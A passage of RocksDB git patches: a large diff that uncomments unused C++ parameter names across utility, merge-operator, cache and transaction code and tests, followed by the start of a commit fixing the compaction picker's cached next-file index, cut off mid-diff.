BlobDBImpl::CloseSeqWrite( - std::shared_ptr<BlobFile> bfile, bool /*aborted*/) { + std::shared_ptr<BlobFile> bfile, bool aborted) { { WriteLock wl(&mutex_); @@ -2052,7 +2051,7 @@ bool BlobDBImpl::CallbackEvictsImpl(std::shared_ptr<BlobFile> bfile) { } std::pair<bool, int64_t> BlobDBImpl::RemoveTimerQ(TimerQueue* tq, - bool /*aborted*/) { + bool aborted) { WriteLock wl(&mutex_); for (auto itr = cb_threads_.begin(); itr != cb_threads_.end(); ++itr) { if ((*itr).get() != tq) continue; diff --git a/utilities/blob_db/blob_log_reader.cc b/utilities/blob_db/blob_log_reader.cc index 09c329a0565..3931c8669b2 100644 --- a/utilities/blob_db/blob_log_reader.cc +++ b/utilities/blob_db/blob_log_reader.cc @@ -41,7 +41,7 @@ Status Reader::ReadHeader(BlobLogHeader* header) { } Status Reader::ReadRecord(BlobLogRecord* record, ReadLevel level, - WALRecoveryMode /*wal_recovery_mode*/) { + WALRecoveryMode wal_recovery_mode) { record->Clear(); buffer_.clear(); backing_store_[0] = '\0'; diff --git a/utilities/checkpoint/checkpoint_impl.cc b/utilities/checkpoint/checkpoint_impl.cc index c1cea914b16..0cdddbd628d 100644 --- a/utilities/checkpoint/checkpoint_impl.cc +++ b/utilities/checkpoint/checkpoint_impl.cc @@ -37,8 +37,8 @@ Status Checkpoint::Create(DB* db, Checkpoint** checkpoint_ptr) { return Status::OK(); } -Status Checkpoint::CreateCheckpoint(const std::string& /*checkpoint_dir*/, - uint64_t /*log_size_for_flush*/) { +Status Checkpoint::CreateCheckpoint(const std::string& checkpoint_dir, + uint64_t log_size_for_flush) { return Status::NotSupported(""); } diff --git a/utilities/checkpoint/checkpoint_test.cc b/utilities/checkpoint/checkpoint_test.cc index ef39541961e..56c8c6e0505 100644 --- a/utilities/checkpoint/checkpoint_test.cc +++ b/utilities/checkpoint/checkpoint_test.cc @@ -370,7 +370,7 @@ TEST_F(CheckpointTest, CheckpointCFNoFlush) { Status s; // Take a snapshot rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DBImpl::BackgroundCallFlush:start", [&](void* /*arg*/) { + "DBImpl::BackgroundCallFlush:start", [&](void* arg) { // Flush should never trigger.
FAIL(); }); diff --git a/utilities/col_buf_decoder.h b/utilities/col_buf_decoder.h index 918f87f9452..e795e4ecdfc 100644 --- a/utilities/col_buf_decoder.h +++ b/utilities/col_buf_decoder.h @@ -23,7 +23,7 @@ struct ColDeclaration; class ColBufDecoder { public: virtual ~ColBufDecoder() = 0; - virtual size_t Init(const char* /*src*/) { return 0; } + virtual size_t Init(const char* src) { return 0; } virtual size_t Decode(const char* src, char** dest) = 0; static ColBufDecoder* NewColBufDecoder(const ColDeclaration& col_declaration); diff --git a/utilities/compaction_filters/remove_emptyvalue_compactionfilter.cc b/utilities/compaction_filters/remove_emptyvalue_compactionfilter.cc index 49760ba5a97..43a25293456 100644 --- a/utilities/compaction_filters/remove_emptyvalue_compactionfilter.cc +++ b/utilities/compaction_filters/remove_emptyvalue_compactionfilter.cc @@ -16,11 +16,12 @@ const char* RemoveEmptyValueCompactionFilter::Name() const { return "RemoveEmptyValueCompactionFilter"; } -bool RemoveEmptyValueCompactionFilter::Filter(int /*level*/, - const Slice& /*key*/, - const Slice& existing_value, - std::string* /*new_value*/, - bool* /*value_changed*/) const { +bool RemoveEmptyValueCompactionFilter::Filter(int level, + const Slice& key, + const Slice& existing_value, + std::string* new_value, + bool* value_changed) const { + // remove kv pairs that have empty values return existing_value.empty(); } diff --git a/utilities/document/document_db.cc b/utilities/document/document_db.cc index ac36f0e7696..f7b5b3b2f3d 100644 --- a/utilities/document/document_db.cc +++ b/utilities/document/document_db.cc @@ -1038,25 +1038,24 @@ class DocumentDBImpl : public DocumentDB { // RocksDB functions using DB::Get; - virtual Status Get(const ReadOptions& /*options*/, - ColumnFamilyHandle* /*column_family*/, - const Slice& /*key*/, PinnableSlice* /*value*/) override { + virtual Status Get(const ReadOptions& options, + ColumnFamilyHandle* column_family, const Slice& key, + PinnableSlice* value) override { return Status::NotSupported(""); } - virtual Status Get(const ReadOptions& /*options*/, const Slice& /*key*/, - std::string* /*value*/) override { + virtual Status Get(const ReadOptions& options, const Slice& key, + std::string* value) override { return Status::NotSupported(""); } - virtual Status Write(const WriteOptions& /*options*/, - WriteBatch* /*updates*/) override { + virtual Status Write(const WriteOptions& options, + WriteBatch* updates) override { return Status::NotSupported(""); } - virtual Iterator* NewIterator( - const ReadOptions& /*options*/, - ColumnFamilyHandle* /*column_family*/) override { + virtual Iterator* NewIterator(const ReadOptions& options, + ColumnFamilyHandle* column_family) override { return nullptr; } - virtual Iterator* NewIterator(const ReadOptions& /*options*/) override { + virtual Iterator* NewIterator(const ReadOptions& options) override { return nullptr; } diff --git a/utilities/merge_operators/max.cc b/utilities/merge_operators/max.cc index ff7b2a75a34..06e233fe89d 100644 --- a/utilities/merge_operators/max.cc +++ b/utilities/merge_operators/max.cc @@ -36,9 +36,9 @@ class MaxOperator : public MergeOperator { return true; } - virtual bool PartialMerge(const Slice& /*key*/, const Slice& left_operand, + virtual bool PartialMerge(const Slice& key, const Slice& left_operand, const Slice& right_operand, std::string* new_value, - Logger* /*logger*/) const override { + Logger* logger) const override { if (left_operand.compare(right_operand) >= 0) { 
new_value->assign(left_operand.data(), left_operand.size()); } else { @@ -47,10 +47,10 @@ return true; } - virtual bool PartialMergeMulti(const Slice& /*key*/, + virtual bool PartialMergeMulti(const Slice& key, const std::deque<Slice>& operand_list, std::string* new_value, - Logger* /*logger*/) const override { + Logger* logger) const override { Slice max; for (const auto& operand : operand_list) { if (max.compare(operand) < 0) { diff --git a/utilities/merge_operators/put.cc b/utilities/merge_operators/put.cc index fcbf67d9b03..7f206ad3b09 100644 --- a/utilities/merge_operators/put.cc +++ b/utilities/merge_operators/put.cc @@ -22,10 +22,11 @@ namespace { // anonymous namespace // From the client-perspective, semantics are the same. class PutOperator : public MergeOperator { public: - virtual bool FullMerge(const Slice& /*key*/, const Slice* /*existing_value*/, + virtual bool FullMerge(const Slice& key, + const Slice* existing_value, const std::deque<std::string>& operand_sequence, std::string* new_value, - Logger* /*logger*/) const override { + Logger* logger) const override { // Put basically only looks at the current/latest value assert(!operand_sequence.empty()); assert(new_value != nullptr); @@ -33,18 +34,20 @@ class PutOperator : public MergeOperator { return true; } - virtual bool PartialMerge(const Slice& /*key*/, const Slice& /*left_operand*/, - const Slice& right_operand, std::string* new_value, - Logger* /*logger*/) const override { + virtual bool PartialMerge(const Slice& key, + const Slice& left_operand, + const Slice& right_operand, + std::string* new_value, + Logger* logger) const override { new_value->assign(right_operand.data(), right_operand.size()); return true; } using MergeOperator::PartialMergeMulti; - virtual bool PartialMergeMulti(const Slice& /*key*/, + virtual bool PartialMergeMulti(const Slice& key, const std::deque<Slice>& operand_list, - std::string* new_value, - Logger* /*logger*/) const override { + std::string* new_value, Logger* logger) const + override { new_value->assign(operand_list.back().data(), operand_list.back().size()); return true; } @@ -55,10 +58,10 @@ class PutOperator : public MergeOperator { }; class PutOperatorV2 : public PutOperator { - virtual bool FullMerge(const Slice& /*key*/, const Slice* /*existing_value*/, - const std::deque<std::string>& /*operand_sequence*/, - std::string* /*new_value*/, - Logger* /*logger*/) const override { + virtual bool FullMerge(const Slice& key, const Slice* existing_value, + const std::deque<std::string>& operand_sequence, + std::string* new_value, + Logger* logger) const override { assert(false); return false; } diff --git a/utilities/merge_operators/string_append/stringappend.cc b/utilities/merge_operators/string_append/stringappend.cc index e3e755dfd8c..ff19348f07b 100644 --- a/utilities/merge_operators/string_append/stringappend.cc +++ b/utilities/merge_operators/string_append/stringappend.cc @@ -21,10 +21,12 @@ StringAppendOperator::StringAppendOperator(char delim_char) } // Implementation for the merge operation (concatenates two strings) -bool StringAppendOperator::Merge(const Slice& /*key*/, +bool StringAppendOperator::Merge(const Slice& key, const Slice* existing_value, - const Slice& value, std::string* new_value, - Logger* /*logger*/) const { + const Slice& value, + std::string* new_value, + Logger* logger) const { + // Clear the *new_value for writing.
assert(new_value); new_value->clear(); diff --git a/utilities/merge_operators/string_append/stringappend2.cc b/utilities/merge_operators/string_append/stringappend2.cc index 6e46d80a139..2d7b7423ce8 100644 --- a/utilities/merge_operators/string_append/stringappend2.cc +++ b/utilities/merge_operators/string_append/stringappend2.cc @@ -68,16 +68,16 @@ bool StringAppendTESTOperator::FullMergeV2( } bool StringAppendTESTOperator::PartialMergeMulti( - const Slice& /*key*/, const std::deque<Slice>& /*operand_list*/, - std::string* /*new_value*/, Logger* /*logger*/) const { + const Slice& key, const std::deque<Slice>& operand_list, + std::string* new_value, Logger* logger) const { return false; } // A version of PartialMerge that actually performs "partial merging". // Use this to simulate the exact behaviour of the StringAppendOperator. bool StringAppendTESTOperator::_AssocPartialMergeMulti( - const Slice& /*key*/, const std::deque<Slice>& operand_list, - std::string* new_value, Logger* /*logger*/) const { + const Slice& key, const std::deque<Slice>& operand_list, + std::string* new_value, Logger* logger) const { // Clear the *new_value for writing assert(new_value); new_value->clear(); diff --git a/utilities/merge_operators/uint64add.cc b/utilities/merge_operators/uint64add.cc index dc761e74b20..d7821737517 100644 --- a/utilities/merge_operators/uint64add.cc +++ b/utilities/merge_operators/uint64add.cc @@ -20,8 +20,10 @@ namespace { // anonymous namespace // Implemented as an AssociativeMergeOperator for simplicity and example. class UInt64AddOperator : public AssociativeMergeOperator { public: - virtual bool Merge(const Slice& /*key*/, const Slice* existing_value, - const Slice& value, std::string* new_value, + virtual bool Merge(const Slice& key, + const Slice* existing_value, + const Slice& value, + std::string* new_value, Logger* logger) const override { uint64_t orig_value = 0; if (existing_value){ diff --git a/utilities/object_registry_test.cc b/utilities/object_registry_test.cc index fe69d9a3959..40fb387bc93 100644 --- a/utilities/object_registry_test.cc +++ b/utilities/object_registry_test.cc @@ -18,14 +18,13 @@ class EnvRegistryTest : public testing::Test { int EnvRegistryTest::num_a = 0; int EnvRegistryTest::num_b = 0; -static Registrar<Env> test_reg_a("a://.*", - [](const std::string& /*uri*/, - std::unique_ptr<Env>* /*env_guard*/) { - ++EnvRegistryTest::num_a; - return Env::Default(); - }); +static Registrar<Env> test_reg_a("a://.*", [](const std::string& uri, + std::unique_ptr<Env>* env_guard) { + ++EnvRegistryTest::num_a; + return Env::Default(); +}); -static Registrar<Env> test_reg_b("b://.*", [](const std::string& /*uri*/, +static Registrar<Env> test_reg_b("b://.*", [](const std::string& uri, std::unique_ptr<Env>* env_guard) { ++EnvRegistryTest::num_b; // Env::Default() is a singleton so we can't grant ownership directly to the diff --git a/utilities/options/options_util_test.cc b/utilities/options/options_util_test.cc index 39fbec52b47..86b382cfab5 100644 --- a/utilities/options/options_util_test.cc +++ b/utilities/options/options_util_test.cc @@ -102,22 +102,22 @@ class DummyTableFactory : public TableFactory { virtual const char* Name() const { return "DummyTableFactory"; } - virtual Status NewTableReader( - const TableReaderOptions& /*table_reader_options*/, - unique_ptr<RandomAccessFileReader>&& /*file*/, uint64_t /*file_size*/, - unique_ptr<TableReader>* /*table_reader*/, - bool /*prefetch_index_and_filter_in_cache*/) const { + virtual Status NewTableReader(const TableReaderOptions& table_reader_options, + unique_ptr<RandomAccessFileReader>&& file, + uint64_t file_size, + unique_ptr<TableReader>*
table_reader, + bool prefetch_index_and_filter_in_cache) const { return Status::NotSupported(); } virtual TableBuilder* NewTableBuilder( - const TableBuilderOptions& /*table_builder_options*/, - uint32_t /*column_family_id*/, WritableFileWriter* /*file*/) const { + const TableBuilderOptions& table_builder_options, + uint32_t column_family_id, WritableFileWriter* file) const { return nullptr; } - virtual Status SanitizeOptions(const DBOptions& /*db_opts*/, - const ColumnFamilyOptions& /*cf_opts*/) const { + virtual Status SanitizeOptions(const DBOptions& db_opts, + const ColumnFamilyOptions& cf_opts) const { return Status::NotSupported(); } @@ -129,15 +129,15 @@ class DummyMergeOperator : public MergeOperator { DummyMergeOperator() {} virtual ~DummyMergeOperator() {} - virtual bool FullMergeV2(const MergeOperationInput& /*merge_in*/, - MergeOperationOutput* /*merge_out*/) const override { + virtual bool FullMergeV2(const MergeOperationInput& merge_in, + MergeOperationOutput* merge_out) const override { return false; } - virtual bool PartialMergeMulti(const Slice& /*key*/, - const std::deque<Slice>& /*operand_list*/, - std::string* /*new_value*/, - Logger* /*logger*/) const override { + virtual bool PartialMergeMulti(const Slice& key, + const std::deque<Slice>& operand_list, + std::string* new_value, + Logger* logger) const override { return false; } @@ -156,10 +156,10 @@ class DummySliceTransform : public SliceTransform { virtual Slice Transform(const Slice& src) const { return src; } // determine whether this is a valid src upon the function applies - virtual bool InDomain(const Slice& /*src*/) const { return false; } + virtual bool InDomain(const Slice& src) const { return false; } // determine whether dst=Transform(src) for some src - virtual bool InRange(const Slice& /*dst*/) const { return false; } + virtual bool InRange(const Slice& dst) const { return false; } }; } // namespace diff --git a/utilities/persistent_cache/block_cache_tier_file.cc b/utilities/persistent_cache/block_cache_tier_file.cc index fac8d75e29a..85e0610b7e4 100644 --- a/utilities/persistent_cache/block_cache_tier_file.cc +++ b/utilities/persistent_cache/block_cache_tier_file.cc @@ -277,7 +277,7 @@ WriteableCacheFile::~WriteableCacheFile() { ClearBuffers(); } -bool WriteableCacheFile::Create(const bool /*enable_direct_writes*/, +bool WriteableCacheFile::Create(const bool enable_direct_writes, const bool enable_direct_reads) { WriteLock _(&rwlock_); diff --git a/utilities/persistent_cache/block_cache_tier_file.h b/utilities/persistent_cache/block_cache_tier_file.h index ef5dbab0408..3922136d67e 100644 --- a/utilities/persistent_cache/block_cache_tier_file.h +++ b/utilities/persistent_cache/block_cache_tier_file.h @@ -103,15 +103,13 @@ class BlockCacheFile : public LRUElement<BlockCacheFile> { virtual ~BlockCacheFile() {} // append key/value to file and return LBA locator to user - virtual bool Append(const Slice& /*key*/, const Slice& /*val*/, - LBA* const /*lba*/) { + virtual bool Append(const Slice& key, const Slice& val, LBA* const lba) { assert(!"not implemented"); return false; } // read from the record locator (LBA) and return key, value and status - virtual bool Read(const LBA& /*lba*/, Slice* /*key*/, Slice* /*block*/, - char* /*scratch*/) { + virtual bool Read(const LBA& lba, Slice* key, Slice* block, char* scratch) { assert(!"not implemented"); return false; } diff --git a/utilities/persistent_cache/hash_table_test.cc b/utilities/persistent_cache/hash_table_test.cc index 6fe5a596545..1a6df4e6144 100644 ---
a/utilities/persistent_cache/hash_table_test.cc +++ b/utilities/persistent_cache/hash_table_test.cc @@ -43,7 +43,7 @@ struct HashTableTest : public testing::Test { } }; - static void ClearNode(Node /*node*/) {} + static void ClearNode(Node node) {} HashTable map_; }; @@ -73,7 +73,7 @@ struct EvictableHashTableTest : public testing::Test { } }; - static void ClearNode(Node* /*node*/) {} + static void ClearNode(Node* node) {} EvictableHashTable map_; }; diff --git a/utilities/persistent_cache/persistent_cache_test.h b/utilities/persistent_cache/persistent_cache_test.h index 37e842f2e2a..77fd172ba08 100644 --- a/utilities/persistent_cache/persistent_cache_test.h +++ b/utilities/persistent_cache/persistent_cache_test.h @@ -233,8 +233,8 @@ class PersistentCacheDBTest : public DBTestBase { // insert data to table void Insert(const Options& options, - const BlockBasedTableOptions& /*table_options*/, - const int num_iter, std::vector<std::string>* values) { + const BlockBasedTableOptions& table_options, const int num_iter, + std::vector<std::string>* values) { CreateAndReopenWithCF({"pikachu"}, options); // default column family doesn't have block cache Options no_block_cache_opts; diff --git a/utilities/persistent_cache/persistent_cache_tier.cc b/utilities/persistent_cache/persistent_cache_tier.cc index 732762a1652..0f500e87127 100644 --- a/utilities/persistent_cache/persistent_cache_tier.cc +++ b/utilities/persistent_cache/persistent_cache_tier.cc @@ -75,12 +75,12 @@ Status PersistentCacheTier::Close() { return Status::OK(); } -bool PersistentCacheTier::Reserve(const size_t /*size*/) { +bool PersistentCacheTier::Reserve(const size_t size) { // default implementation is a pass through return true; } -bool PersistentCacheTier::Erase(const Slice& /*key*/) { +bool PersistentCacheTier::Erase(const Slice& key) { // default implementation is a pass through since not all cache tiers might // support erase return true; diff --git a/utilities/persistent_cache/volatile_tier_impl.cc b/utilities/persistent_cache/volatile_tier_impl.cc index 177fc916904..d190a210282 100644 --- a/utilities/persistent_cache/volatile_tier_impl.cc +++ b/utilities/persistent_cache/volatile_tier_impl.cc @@ -106,7 +106,7 @@ Status VolatileCacheTier::Lookup(const Slice& page_key, return Status::NotFound("key not found in volatile cache"); } -bool VolatileCacheTier::Erase(const Slice& /*key*/) { +bool VolatileCacheTier::Erase(const Slice& key) { assert(!"not supported"); return true; } diff --git a/utilities/redis/redis_list_iterator.h b/utilities/redis/redis_list_iterator.h index 1c4bc11e590..73907ddf8c4 100644 --- a/utilities/redis/redis_list_iterator.h +++ b/utilities/redis/redis_list_iterator.h @@ -288,7 +288,7 @@ class RedisListIterator { /// Will throw an exception based on the passed-in message. /// This function is guaranteed to STOP THE CONTROL-FLOW. /// (i.e.: you do not have to call "return" after calling ThrowError) - void ThrowError(const char* const /*msg*/ = NULL) { + void ThrowError(const char* const msg = NULL) { // TODO: For now we ignore the msg parameter. This can be expanded later.
throw RedisListException(); } diff --git a/utilities/simulator_cache/sim_cache.cc b/utilities/simulator_cache/sim_cache.cc index 6c0adf6a740..335ac9896d0 100644 --- a/utilities/simulator_cache/sim_cache.cc +++ b/utilities/simulator_cache/sim_cache.cc @@ -43,7 +43,7 @@ class SimCacheImpl : public SimCache { Handle* h = key_only_cache_->Lookup(key); if (h == nullptr) { key_only_cache_->Insert(key, nullptr, charge, - [](const Slice& /*k*/, void* /*v*/) {}, nullptr, + [](const Slice& k, void* v) {}, nullptr, priority); } else { key_only_cache_->Release(h); diff --git a/utilities/simulator_cache/sim_cache_test.cc b/utilities/simulator_cache/sim_cache_test.cc index d01cdd5304d..01b328c783e 100644 --- a/utilities/simulator_cache/sim_cache_test.cc +++ b/utilities/simulator_cache/sim_cache_test.cc @@ -39,7 +39,7 @@ class SimCacheTest : public DBTestBase { return options; } - void InitTable(const Options& /*options*/) { + void InitTable(const Options& options) { std::string value(kValueSize, 'a'); for (size_t i = 0; i < kNumBlocks * 2; i++) { ASSERT_OK(Put(ToString(i), value.c_str())); diff --git a/utilities/spatialdb/spatial_db.cc b/utilities/spatialdb/spatial_db.cc index a9b990ee20f..539ddd06ee0 100644 --- a/utilities/spatialdb/spatial_db.cc +++ b/utilities/spatialdb/spatial_db.cc @@ -704,7 +704,7 @@ DBOptions GetDBOptionsFromSpatialDBOptions(const SpatialDBOptions& options) { return db_options; } -ColumnFamilyOptions GetColumnFamilyOptions(const SpatialDBOptions& /*options*/, +ColumnFamilyOptions GetColumnFamilyOptions(const SpatialDBOptions& options, std::shared_ptr<Cache> block_cache) { ColumnFamilyOptions column_family_options; column_family_options.write_buffer_size = 128 * 1024 * 1024; // 128MB diff --git a/utilities/table_properties_collectors/compact_on_deletion_collector.cc b/utilities/table_properties_collectors/compact_on_deletion_collector.cc index 625318609d9..304cdfff889 100644 --- a/utilities/table_properties_collectors/compact_on_deletion_collector.cc +++ b/utilities/table_properties_collectors/compact_on_deletion_collector.cc @@ -39,11 +39,10 @@ void CompactOnDeletionCollector::Reset() { // @params key the user key that is inserted into the table. // @params value the value that is inserted into the table. // @params file_size file size up to now -Status CompactOnDeletionCollector::AddUserKey(const Slice& /*key*/, - const Slice& /*value*/, - EntryType type, - SequenceNumber /*seq*/, - uint64_t /*file_size*/) { +Status CompactOnDeletionCollector::AddUserKey( + const Slice& key, const Slice& value, + EntryType type, SequenceNumber seq, + uint64_t file_size) { if (need_compaction_) { // If the output file already needs to be compacted, skip the check.
return Status::OK(); @@ -78,7 +77,7 @@ Status CompactOnDeletionCollector::AddUserKey(const Slice& /*key*/, TablePropertiesCollector* CompactOnDeletionCollectorFactory::CreateTablePropertiesCollector( - TablePropertiesCollectorFactory::Context /*context*/) { + TablePropertiesCollectorFactory::Context context) { return new CompactOnDeletionCollector( sliding_window_size_, deletion_trigger_); } diff --git a/utilities/table_properties_collectors/compact_on_deletion_collector.h b/utilities/table_properties_collectors/compact_on_deletion_collector.h index 34cd633659b..bd240e5170d 100644 --- a/utilities/table_properties_collectors/compact_on_deletion_collector.h +++ b/utilities/table_properties_collectors/compact_on_deletion_collector.h @@ -60,7 +60,7 @@ class CompactOnDeletionCollector : public TablePropertiesCollector { // for writing the properties block. // @params properties User will add their collected statistics to // `properties`. - virtual Status Finish(UserCollectedProperties* /*properties*/) override { + virtual Status Finish(UserCollectedProperties* properties) override { Reset(); return Status::OK(); } diff --git a/utilities/table_properties_collectors/compact_on_deletion_collector_test.cc b/utilities/table_properties_collectors/compact_on_deletion_collector_test.cc index eabc2271c48..3c946bf414f 100644 --- a/utilities/table_properties_collectors/compact_on_deletion_collector_test.cc +++ b/utilities/table_properties_collectors/compact_on_deletion_collector_test.cc @@ -20,7 +20,7 @@ #include "util/random.h" #include "utilities/table_properties_collectors/compact_on_deletion_collector.h" -int main(int /*argc*/, char** /*argv*/) { +int main(int argc, char** argv) { const int kWindowSizes[] = {1000, 10000, 10000, 127, 128, 129, 255, 256, 257, 2, 10000}; const int kDeletionTriggers[] = diff --git a/utilities/transactions/optimistic_transaction_impl.cc b/utilities/transactions/optimistic_transaction_impl.cc index bae0d609f29..5652189bc35 100644 --- a/utilities/transactions/optimistic_transaction_impl.cc +++ b/utilities/transactions/optimistic_transaction_impl.cc @@ -133,7 +133,7 @@ Status OptimisticTransactionImpl::CheckTransactionForConflicts(DB* db) { true /* cache_only */); } -Status OptimisticTransactionImpl::SetName(const TransactionName& /*name*/) { +Status OptimisticTransactionImpl::SetName(const TransactionName& name) { return Status::InvalidArgument("Optimistic transactions cannot be named."); } diff --git a/utilities/transactions/optimistic_transaction_impl.h b/utilities/transactions/optimistic_transaction_impl.h index 3618c69326e..6baec6962ec 100644 --- a/utilities/transactions/optimistic_transaction_impl.h +++ b/utilities/transactions/optimistic_transaction_impl.h @@ -67,8 +67,8 @@ class OptimisticTransactionImpl : public TransactionBaseImpl { void Clear() override; - void UnlockGetForUpdate(ColumnFamilyHandle* /*column_family*/, - const Slice& /*key*/) override { + void UnlockGetForUpdate(ColumnFamilyHandle* column_family, + const Slice& key) override { // Nothing to unlock. 
} diff --git a/utilities/transactions/transaction_base.h b/utilities/transactions/transaction_base.h index 105da0ab9e2..1514836489e 100644 --- a/utilities/transactions/transaction_base.h +++ b/utilities/transactions/transaction_base.h @@ -165,7 +165,7 @@ class TransactionBaseImpl : public Transaction { WriteBatchWithIndex* GetWriteBatch() override; - virtual void SetLockTimeout(int64_t /*timeout*/) override { /* Do nothing */ + virtual void SetLockTimeout(int64_t timeout) override { /* Do nothing */ } const Snapshot* GetSnapshot() const override { diff --git a/utilities/transactions/transaction_impl.cc b/utilities/transactions/transaction_impl.cc index 2e3d69633bf..408b15bcd3d 100644 --- a/utilities/transactions/transaction_impl.cc +++ b/utilities/transactions/transaction_impl.cc @@ -367,12 +367,12 @@ Status TransactionImpl::LockBatch(WriteBatch* batch, } virtual Status PutCF(uint32_t column_family_id, const Slice& key, - const Slice& /*value*/) override { + const Slice& value) override { RecordKey(column_family_id, key); return Status::OK(); } virtual Status MergeCF(uint32_t column_family_id, const Slice& key, - const Slice& /*value*/) override { + const Slice& value) override { RecordKey(column_family_id, key); return Status::OK(); } diff --git a/utilities/transactions/transaction_impl.h b/utilities/transactions/transaction_impl.h index 79db430e759..01f8f4b2a2d 100644 --- a/utilities/transactions/transaction_impl.h +++ b/utilities/transactions/transaction_impl.h @@ -180,7 +180,7 @@ class TransactionCallback : public WriteCallback { public: explicit TransactionCallback(TransactionImpl* txn) : txn_(txn) {} - Status Callback(DB* /*db*/) override { + Status Callback(DB* db) override { if (txn_->IsExpired()) { return Status::Expired(); } else { diff --git a/utilities/transactions/transaction_test.cc b/utilities/transactions/transaction_test.cc index 7b2f8a3c768..ce01388f8a8 100644 --- a/utilities/transactions/transaction_test.cc +++ b/utilities/transactions/transaction_test.cc @@ -211,7 +211,7 @@ TEST_P(TransactionTest, WaitingTxn) { ASSERT_TRUE(txn2); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "TransactionLockMgr::AcquireWithTimeout:WaitingTxn", [&](void* /*arg*/) { + "TransactionLockMgr::AcquireWithTimeout:WaitingTxn", [&](void* arg) { std::string key; uint32_t cf_id; std::vector<TransactionID> wait = txn2->GetWaitingTxns(&cf_id, &key); @@ -433,7 +433,7 @@ TEST_P(TransactionTest, DeadlockCycleShared) { std::atomic<int> checkpoints(0); rocksdb::SyncPoint::GetInstance()->SetCallBack( "TransactionLockMgr::AcquireWithTimeout:WaitingTxn", - [&](void* /*arg*/) { checkpoints.fetch_add(1); }); + [&](void* arg) { checkpoints.fetch_add(1); }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); // We want the leaf transactions to block and hold everyone back.
@@ -501,7 +501,7 @@ TEST_P(TransactionTest, DeadlockCycle) { std::atomic<int> checkpoints(0); rocksdb::SyncPoint::GetInstance()->SetCallBack( "TransactionLockMgr::AcquireWithTimeout:WaitingTxn", - [&](void* /*arg*/) { checkpoints.fetch_add(1); }); + [&](void* arg) { checkpoints.fetch_add(1); }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); // We want the last transaction in the chain to block and hold everyone @@ -4423,7 +4423,7 @@ TEST_P(TransactionTest, ExpiredTransactionDataRace1) { rocksdb::SyncPoint::GetInstance()->LoadDependency( {{"TransactionTest::ExpirableTransactionDataRace:1"}}); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "TransactionTest::ExpirableTransactionDataRace:1", [&](void* /*arg*/) { + "TransactionTest::ExpirableTransactionDataRace:1", [&](void* arg) { WriteOptions write_options; TransactionOptions txn_options; diff --git a/utilities/ttl/ttl_test.cc b/utilities/ttl/ttl_test.cc index 7aa411b6183..586d0ce1f6c 100644 --- a/utilities/ttl/ttl_test.cc +++ b/utilities/ttl/ttl_test.cc @@ -295,8 +295,8 @@ class TtlTest : public testing::Test { // Keeps key if it is in [kSampleSize_/3, 2*kSampleSize_/3), // Change value if it is in [2*kSampleSize_/3, kSampleSize_) // Eg. kSampleSize_=6. Drop:key0-1...Keep:key2-3...Change:key4-5... - virtual bool Filter(int /*level*/, const Slice& key, const Slice& /*value*/, - std::string* new_value, + virtual bool Filter(int level, const Slice& key, + const Slice& value, std::string* new_value, bool* value_changed) const override { assert(new_value != nullptr); @@ -345,7 +345,7 @@ class TtlTest : public testing::Test { } virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter( - const CompactionFilter::Context& /*context*/) override { + const CompactionFilter::Context& context) override { return std::unique_ptr<CompactionFilter>( new TestFilter(kSampleSize_, kNewValue_)); } diff --git a/utilities/write_batch_with_index/write_batch_with_index_test.cc b/utilities/write_batch_with_index/write_batch_with_index_test.cc index 105f7517d29..5b1250a6431 100644 --- a/utilities/write_batch_with_index/write_batch_with_index_test.cc +++ b/utilities/write_batch_with_index/write_batch_with_index_test.cc @@ -63,7 +63,7 @@ struct TestHandler : public WriteBatch::Handler { seen[column_family_id].push_back(e); return Status::OK(); } - virtual void LogData(const Slice& /*blob*/) {} + virtual void LogData(const Slice& blob) {} virtual Status DeleteCF(uint32_t column_family_id, const Slice& key) { Entry e; e.key = key.ToString(); From a34b2e388ee51173e44f6aa290f1301c33af9e67 Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Fri, 21 Jul 2017 20:56:32 -0700 Subject: [PATCH 027/205] Fix caching of compaction picker's next index Summary: The previous implementation of caching the `file_size` index made no sense. It only remembered the original span of locked files starting from the beginning of `file_size`. We should instead remember the index after all compactions that have been considered but rejected. This reduces the work we do while holding the db mutex.
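In other words, the cached cursor should land one past every file that has already been examined and rejected, so the next PickCompaction() call resumes there instead of rescanning the level. A minimal sketch of that policy (files, TryPickFile, and next_compaction_index are illustrative stand-ins, not the actual picker code):

    // Resume where the previous PickCompaction() call stopped.
    unsigned int cmp_idx = next_compaction_index;
    for (; cmp_idx < files.size(); cmp_idx++) {
      if (files[cmp_idx]->being_compacted) {
        continue;  // already part of a running compaction; skip it
      }
      if (TryPickFile(files[cmp_idx])) {
        // Picked. The file is now marked being_compacted, so leaving the
        // cursor here is safe: the next call skips over it immediately.
        break;
      }
      // A rejected file is never re-examined while holding the DB mutex.
    }
    next_compaction_index = cmp_idx;  // remember for the next call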
Closes https://github.com/facebook/rocksdb/pull/2624 Differential Revision: D5468152 Pulled By: ajkr fbshipit-source-id: ab92a4bffe76f9f174d861bb5812b974d1013400 --- db/compaction_picker.cc | 17 +++++--------- db/compaction_picker_test.cc | 43 ++++++++++++++++++++++++++++++++++++ 2 files changed, 48 insertions(+), 12 deletions(-) diff --git a/db/compaction_picker.cc b/db/compaction_picker.cc index 6ee4ebd1f16..c6a56746ff0 100644 --- a/db/compaction_picker.cc +++ b/db/compaction_picker.cc @@ -1323,12 +1323,10 @@ bool LevelCompactionBuilder::PickFileToCompact() { const std::vector<FileMetaData*>& level_files = vstorage_->LevelFiles(start_level_); - // record the first file that is not yet compacted - int nextIndex = -1; - - for (unsigned int i = vstorage_->NextCompactionIndex(start_level_); - i < file_size.size(); i++) { - int index = file_size[i]; + unsigned int cmp_idx; + for (cmp_idx = vstorage_->NextCompactionIndex(start_level_); + cmp_idx < file_size.size(); cmp_idx++) { + int index = file_size[cmp_idx]; auto* f = level_files[index]; // do not pick a file to compact if it is being compacted @@ -1337,11 +1335,6 @@ continue; } - // remember the startIndex for the next call to PickCompaction - if (nextIndex == -1) { - nextIndex = i; - } - start_level_inputs_.files.push_back(f); start_level_inputs_.level = start_level_; if (!compaction_picker_->ExpandInputsToCleanCut(cf_name_, vstorage_, @@ -1377,7 +1370,7 @@ } // store where to start the iteration in the next call to PickCompaction - vstorage_->SetNextCompactionIndex(start_level_, nextIndex); + 